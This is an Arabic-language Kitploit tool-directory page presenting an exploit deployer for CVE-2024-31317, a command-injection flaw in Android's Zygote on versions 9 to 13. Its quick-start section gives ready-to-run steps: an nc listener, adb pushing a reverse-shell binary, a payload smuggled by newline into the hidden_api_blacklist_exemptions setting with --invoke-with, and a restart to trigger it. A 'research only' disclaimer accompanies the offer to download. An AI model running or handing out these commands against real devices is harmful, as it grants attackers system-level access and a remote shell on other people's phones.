Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 أداة بحث ونشر ثغرة حقن الأوامر في Android Zygote | إطار استغلال الثغرات Android 9-13 | Kitploit
أدوات/GitHubGitHub/fcy10012/cve-2024-31317-deployer
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubfcy10012/cve-2024-31317-deployer

CVE-2024-31317-Deployer

CVE-2024-31317 أداة بحث ونشر ثغرة حقن الأوامر في Android Zygote | إطار استغلال الثغرات Android 9-13

عرض المستودع
622منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-31317 Deployer

License Android Status

🔒 بيان البحث الأمني

هذا المشروع مخصص لأغراض البحث والتعليم الأمني فقط. استخدام هذه الأداة في اختبار غير مصرح به غير قانوني. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر.

📋 نظرة عامة

CVE-2024-31317 هو ثغرة أمنية خطيرة تؤثر على أجهزة Android من الإصدار 9 إلى 13، وتسمح للتطبيقات التي لديها إذن WRITE_SECURE_SETTINGS بالحصول على صلاحيات على مستوى النظام من خلال حقن الأوامر.

يوفر هذا المشروع تحليلًا تقنيًا مفصلاً للثغرة، وكود إثبات المفهوم، وأدوات النشر الآلي.

✨ الميزات الرئيسية

  • 📱 دعم جميع إصدارات Android 9-13
  • 🛠️ سكريبتات نشر آلية
  • 🔄 اتصال شل عكسي (Reverse Shell)
  • 📊 توثيق تقني مفصل
  • 🎯 تصميم معياري (Modular)

🐛 تفاصيل الثغرة

  • CVE ID: CVE-2024-31317
  • نوع الثغرة: حقن أوامر (Command Injection)
  • مستوى الخطورة: عالي (High)
  • درجة CVSS: 7.8
  • المكون المتأثر: عملية Zygote في Android
  • حالة الإصلاح: تم الإصلاح في تصحيح أمان Android لشهر يونيو 2024

🎯 نطاق التأثير

الإصدارات المتأثرة

  • ✅ Android 9-13

الإصدارات غير المتأثرة

  • ❌ Android 14+ (تم الإصلاح)
  • ❌ الأجهزة المثبت عليها تصحيح أمان يونيو 2024 أو أحدث

📁 هيكل المشروع

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 البدء السريع

1. استنساخ المشروع

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. ترجمة الحمولة (Payload)

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. النشر

root@kitploit:~
# تشغيل المستمع
nc -lvnp 4444

# دفع وتنفيذ
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# حقن الحمولة
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# تشغيل الثغرة
adb shell stop && adb shell start

📚 التوثيق

  • تحليل تقني معمق
  • دليل استخدام الحمولة
  • دليل الاستخدام الكامل

⚠️ إخلاء مسؤولية

هذا المشروع مخصص لأغراض البحث والتعليم الأمني فقط. باستخدام هذه الأداة، فإنك توافق على:

  • الامتثال لجميع القوانين واللوائح المعمول بها
  • استخدامها فقط في أبحاث أمنية مشروعة
  • تحمل المسؤولية الكاملة عن أفعالك

📜 الترخيص

هذا المشروع مرخص بموجب ترخيص MIT - انظر ملف LICENSE للتفاصيل

👨‍💻 المؤلف

fcy10012 - GitHub

🙏 شكر وتقدير

المشروع المرجعي: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ إذا كان هذا المشروع مفيدًا لك، فضلاً أعطه نجمة!

تنزيل الأداة